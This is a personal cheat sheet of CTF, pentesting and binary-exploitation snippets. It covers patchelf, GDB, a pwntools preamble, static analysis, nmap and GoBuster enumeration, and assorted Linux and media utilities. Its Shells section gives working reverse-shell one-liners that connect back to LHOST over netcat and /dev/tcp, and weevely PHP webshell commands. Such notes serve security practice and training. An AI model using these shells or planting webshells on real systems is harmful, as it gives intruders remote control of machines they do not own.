This is a collection of CTF, pentesting, binary exploitation, and miscellaneous snippets that I use often. Click on the snippets to copy them.
Binary Security
patchelf
Use a different libc by patching the ELF's loader and base directory.
patchelf --set-interpreter ./ld.so --set-rpath . ./chall
Get libc from a .deb
If you're looking for a libc (for example, one you found on blukat.me, like this one), you can download the package for it (this example uses a .deb).
ar x libc6_2.24-11+deb9u4_amd64.deb && tar xf ./data.tar.xz
The ld and libc will be inside ./lib.
GDB Base Address
GDB uses the same base address when a progam is launched from GDB (with default settings) or when ASLR (on the whole system) is turned off.
0x555555554000
CPIO Operations
Initial ramdisks for Linux-based operating environments are often stored in cpio files.
gunzip -d initramfs.cpio.gz; cpio -idm < initramfs.cpio
Here is a script for rebuilding a cpio archive.
#!/bin/bash set -e cd initramdisk gcc -static exploit.c -o exploit find . | cpio -o -H newc | gzip -c > ../new.cpio.gz
pwntools
Here is an example setup/preamble for a pwntools script.
# CTF Challenge Name
# 20XX-XX-XX
from pwn import *
#################
# --- SETUP --- #
#################
context.terminal = ["tmux", "splitw", "-h"]
context.binary = binary = ELF("./binary-name", checksec=False)
if args.REMOTE:
context.noptrace = True
p = remote("challenge.host.example.org", 1024)
else:
p = process(binary.path)
gdb.attach(p, gdbscript="""
""")GDB
Syscalls
You can break on syscalls by using "catch", for example, 'catch syscall read' or 'catch syscall 0':
catch syscall [type or number]
Search
Search for byte pattern (gef).
search-pattern 0xffff
Set Memory
You can set arbitrary memory at arbitrary addresses with GDB.
set {char[12]}(0x555555578000) = "coolst\xffring"
Source Code Vulnerability Analysis
scan-build
Run clang's static code analyzer (C/C++), and run the web GUI (allowing all hosts to access it, useful for headless VMs):
scan-build make
scan-view --host "0.0.0.0" --allow-all-hosts /tmp/scan-build-*
weggli
Find patterns in source code (see: this blog post)
weggli --unique '$a = 0; _ / $a' ~/source-code-folder # (find divisions by zero)
Compile with clang ASAN
make LDFLAGS="-lasan" CC="clang" CFLAGS="-fsanitize=address"
Network Enumeration
nmap
This is my go-to command. It will scan all TCP ports and print them out (-v, verbose) when found.
nmap -n -Pn -v --max-retries 1 -T4 -p- RHOST
If stuck, hit 'em with the UDP scan:
nmap -sU -p- --max-retries 2 RHOST
GoBuster
Enumerate a site's directories:
gobuster dir -u http://RHOST/ -w /usr/share/wordlists/dirb/common.txt
GoBuster binaries here.
Shells
Reverse Shells
First method is using netcat (without the -e option, for example, netcat-openbsd). On your local computer:
nc -nvlp 443On remote computer:
mknod /tmp/backpipe p && /bin/sh 0< /tmp/backpipe | nc LHOST 443 1> /tmp/backpipe
Second approach uses bash's built-in networking features. On local:
nc -nvlp 443On remote:
bash -i >& /dev/tcp/LHOST/443 0>&1PHP Shells
Weevely can generate compact binding webshells. Build:
weevely generate password ./shell.php
Connect:
weevely RHOST/shell.php password
Alternatively, you can just use p0wny. It can be found here.
Linux
Convert ova to qcow2
Down with VMWare, long live QEMU.
tar xf mycoolvm.ova && qemu-img convert -f vmdk mycoolvm.vmdk mycoolvm.qcow2
Optionally if the VM's declared disk size is big, shrink it:
qemu-img convert -O qcow2 mycoolvm.qcow2 mycoolvm-shrunk.qcow2
Compile the Linux Kernel
It's surprisingly easy. First clone the repo:
git clone https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
Make the config (use menuconfig for a TUI):
make defconfig
And compile it. -j8 means use 8 CPU cores.
make -j8
If you want to run it with qemu, you can use this:
qemu-system-x86_64 -kernel arch/x86_64/boot/bzImage -nographic -append "console=ttyS0" -initrd ramdisk.img -m 512 --enable-kvm -s -S # (source)
Exit QEMU with C-a c p (CTRL-a, then c, then p).
Build Docker Image
You have a docker file and you want to run it. This example uses an image called carrots that runs a service on port 80.
docker build -t carrots . && docker run -p 80:80 -d carrots:latest
Killing Network Connections
If your net utils are up to date, you can kill all connections (or, all sockets) not from your IP address.
ss -Kn '( ! src LHOST )'
Reverse SSHFS
This is not secure (a malicious guest sshd could retrieve arbitrary files from host). But it's very useful for "trusted" VMs! dpipe is from vde2.
dpipe /usr/lib/ssh/sftp-server = ssh user@RHOST sshfs :local_path remote_path -o slave,allow_other
Media
pandoc
Convert anything to anything else.
pandoc lab-details.docx -o lab.txt
ghostscript
Reduce PDF size without it looking noticeably bad.
gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/printer -dNOPAUSE -dQUIET -dBATCH -sOutputFile=output.pdf input.pdf
XLSX to CSV
Convert XLSX sheet to a CSV with gnumeric:
ssconvert --export-type=Gnumeric_stf:stf_csv random_file.xlsx gnumeric_converted.csv